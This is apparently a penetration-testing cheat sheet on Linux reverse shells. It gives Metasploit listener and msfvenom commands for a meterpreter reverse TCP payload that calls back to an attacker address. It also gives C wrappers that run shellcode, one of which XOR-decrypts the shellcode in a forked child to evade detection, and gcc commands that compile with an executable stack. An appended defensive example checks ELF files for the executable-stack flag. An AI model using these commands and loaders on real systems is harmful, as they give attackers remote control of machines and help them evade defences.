Shells

Basic Linux Reverse Shell

  • Configure the listener

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.X.Y; set LPORT 443; exploit -j"

  • Configure a payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.X.Y -f c

  • Create a wrapper called hack.c

hack.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// msfvenom -p linux/x64/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.X.Y -f c
unsigned char buf[] = "\x48\x31";

int main (int argc, char **argv)
{
    // Run our shellcode: cast the buffer to a function pointer and call it
    int (*ret)() = (int(*)())buf;
    ret();
}

  • Compile the code with gcc

gcc -o hack.out hack.c -z execstack

Encrypted Linux Reverse Shell

encrypted_xor.c
#define _GNU_SOURCE
#include <sys/mman.h>
#include <stdint.h>
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>

// compile with - gcc -o final.out encrypted_xor.c -z execstack
// msfvenom -p linux/x64/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.X.Y -f c --encrypt xor --encrypt-key J

unsigned char buf[] = "\x02\x7b\xb5\x20\x43\x12\xd3....";

int main(int argc, char** argv)
{
    if (fork() == 0)
    {
        // Child: undo the single-byte XOR in place (sizeof counts the trailing NUL, so skip it)
        char xor_key = 'J';
        int arraysize = (int)sizeof(buf);
        for (int i = 0; i < arraysize - 1; i++)
        {
            buf[i] = buf[i] ^ xor_key;
        }

        // Make the page that holds the start of buf readable and executable
        intptr_t pagesize = sysconf(_SC_PAGESIZE);
        if (mprotect((void*)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ | PROT_EXEC))
        {
            perror("mprotect");
            return -1;
        }
        int (*ret)() = (int(*)())buf;
        ret();
    }
    else
    {
        // Parent: report and exit
        printf("done");
    }
    return 3;
}
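
Both builds above pass -z execstack, which sets the executable bit on the binary's PT_GNU_STACK program header, a property a defender can check when triaging unknown ELF files. The following is an added example, not part of the original page: it parses a little-endian ELF64 image and reports that flag. The function names and the constructed 120-byte sample image are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PT_GNU_STACK_ID 0x6474e551u  /* program header type carrying stack permissions */
#define PF_EXEC 0x1u                 /* p_flags bit: segment is executable */

/* Read an n-byte little-endian field (x86-64 ELF files are little-endian). */
static uint64_t rd(const unsigned char *p, int n) {
    uint64_t v = 0;
    while (n--) v = (v << 8) | p[n];
    return v;
}

/* 1: PT_GNU_STACK asks for an executable stack; 0: it does not, or the header
 * is absent; -1: buffer is not a well-formed little-endian ELF64 image. */
int elf64_execstack(const unsigned char *img, size_t len) {
    if (len < 64 || memcmp(img, "\x7f" "ELF", 4) != 0 || img[4] != 2 || img[5] != 1)
        return -1;
    uint64_t phoff = rd(img + 32, 8);   /* e_phoff */
    uint64_t entsz = rd(img + 54, 2);   /* e_phentsize */
    uint64_t n = rd(img + 56, 2);       /* e_phnum */
    if (entsz < 56 || phoff > len || n * entsz > len - phoff)
        return -1;
    for (uint64_t i = 0; i < n; i++) {
        const unsigned char *ph = img + phoff + i * entsz;
        if (rd(ph, 4) == PT_GNU_STACK_ID)              /* p_type */
            return (rd(ph + 4, 4) & PF_EXEC) ? 1 : 0;  /* p_flags */
    }
    return 0;
}

/* Verdict for a constructed 120-byte image: ELF64 header + one PT_GNU_STACK entry. */
int sample_verdict(uint32_t flags) {
    unsigned char img[120] = {0x7f, 'E', 'L', 'F', 2, 1, 1};  /* magic, ELFCLASS64, LSB */
    img[32] = 64; img[54] = 56; img[56] = 1;   /* e_phoff, e_phentsize, e_phnum */
    for (int i = 0; i < 4; i++) {
        img[64 + i] = (PT_GNU_STACK_ID >> (8 * i)) & 0xff;  /* p_type */
        img[68 + i] = (flags >> (8 * i)) & 0xff;            /* p_flags */
    }
    return elf64_execstack(img, sizeof img);
}

int main(void) {
    printf("PT_GNU_STACK RWX (built with -z execstack): %d\n", sample_verdict(7));
    printf("PT_GNU_STACK RW  (toolchain default):       %d\n", sample_verdict(6));
    return 0;
}
```

On a real file, readelf -lW shows the same header as a GNU_STACK row whose flags read RWE when the stack is executable.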

Last updated 3 years ago